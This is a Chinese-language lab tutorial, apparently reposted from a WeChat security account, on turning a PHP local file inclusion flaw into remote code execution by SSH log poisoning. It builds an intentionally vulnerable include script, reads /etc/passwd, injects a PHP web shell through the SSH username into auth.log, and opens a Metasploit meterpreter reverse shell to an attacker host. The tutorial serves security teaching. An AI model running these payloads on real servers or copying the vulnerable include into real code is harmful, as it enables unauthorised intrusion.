带有 LFI 和 SSH 日志中毒的 RCE

admin 2024年12月15日23:24:31评论9 views字数 1850阅读6分10秒阅读模式

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

在本文中,您将了解如何在身份验证日志文件的帮助下,在 Web 服务器遭受本地文件包含漏洞的情况下对其进行未经授权的访问。

攻击者:Kali Linux

目标:Ubuntu

开始吧!

创建一个 PHP 文件,允许用户通过文件参数包含文件。因此,使用文件参数我们可以执行包含恶意代码的文件,从而对目标 PC 进行未经授权的访问。 

<?php$file = $_GET['file']; if(isset($file))    { include("$file");    } else   { include("index.php");    } ?>
我已将下面的 PHP 代码保存为文本文件 
lfi.php 
,并保存在桌面上。
带有 LFI 和 SSH 日志中毒的 RCE
现在以“root”用户身份登录并在/var/www/html内创建文件夹“lfi
cd /var/www/html mkdir lfi
使用以下命令将
lfi.php 
文件从桌面移动到 /var/www/html。
mv /home/raj/Desktop/lfi.php。
带有 LFI 和 SSH 日志中毒的 RCE
由于我们在 /var/www/html 中添加了一个带有 include 函数的 php 文件,因此可以通过它读取另一个文件的内容,并可能导致 LFI 攻击。让我们通过探索以下 URL 来读取密码文件来演示这一点:
localhost/lfi/lfi.php?file=/etc/passwd
从给定的图像中您可以观察到上述 URL 已转储如下所示的结果。
带有 LFI 和 SSH 日志中毒的 RCE
在 Kali Linux 中打开终端并通过 SSH 服务连接目标
ssh user@192.168.1.129
从截图中您可以看到我已与目标系统连接。
带有 LFI 和 SSH 日志中毒的 RCE
键入以下命令来查看其日志:
tail -f /var/log/auth.log
从下图中您可以检查 auth.log 文件生成的日志的详细信息。
带有 LFI 和 SSH 日志中毒的 RCE
现在我将尝试通过浏览器上的 lfi.php 打开 auth.log 日志文件,因此,授予读写权限
cd /var/log/ chmod 775 auth.log
现在将 auth.log 文件作为文件参数包含在内,并在浏览器中提供以下 URL。
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
从给定的图像中您可以看到它也在浏览器中显示创建的身份验证日志。
带有 LFI 和 SSH 日志中毒的 RCE
因为当我们尝试连接 Web 服务器时,auth.log 文件会为每次成功和失败的登录尝试生成日志。利用此功能,我现在将以虚假用户的身份发送
恶意 PHP 代码
 ,它将自动作为新日志添加到 auth.log 文件中。
ssh'<?php system($_GET['c']); ?>'@192.168.1.129
带有 LFI 和 SSH 日志中毒的 RCE

再次检查其日志时,您会发现 PHP 代码已添加了新日志。

键入以下命令来查看其日志:

tail -f /var/log/auth.log
带有 LFI 和 SSH 日志中毒的 RCE
这里它将转储 auth.log 的数据并执行通过 cmd 给出的命令;现在执行
 ifconfig
作为 cmd 命令来验证网络接口并从给定的屏幕截图中确认其结果。
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
带有 LFI 和 SSH 日志中毒的 RCE
如果您在任何 Web 应用程序中发现此类漏洞,那么您可以使用 Metasploit 平台来利用 Web 服务器。
msf exploit (web_delivery)>set target 1msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcpmsf exploit (web_delivery)> set lhost 192.168.1.123msf exploit (web_delivery)>set srvport 8081msf exploit (web_delivery)>exploit
复制
 下面窗口中显示的
突出显示的
 文本 
带有 LFI 和 SSH 日志中毒的 RCE
将上面
 复制的恶意代码粘贴到 URL 中,如给定图所示,并将  其 作为命令
执行。
带有 LFI 和 SSH 日志中毒的 RCE
当上述代码执行时,您将获得目标 Web 服务器的 meterpreter 会话 1。
msf exploit(web_delivery)>sessions 1meterpreter> sysinfo
带有 LFI 和 SSH 日志中毒的 RCE

原文始发于微信公众号(三沐数安):带有 LFI 和 SSH 日志中毒的 RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月15日23:24:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   带有 LFI 和 SSH 日志中毒的 RCEhttps://cn-sec.com/archives/3510344.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息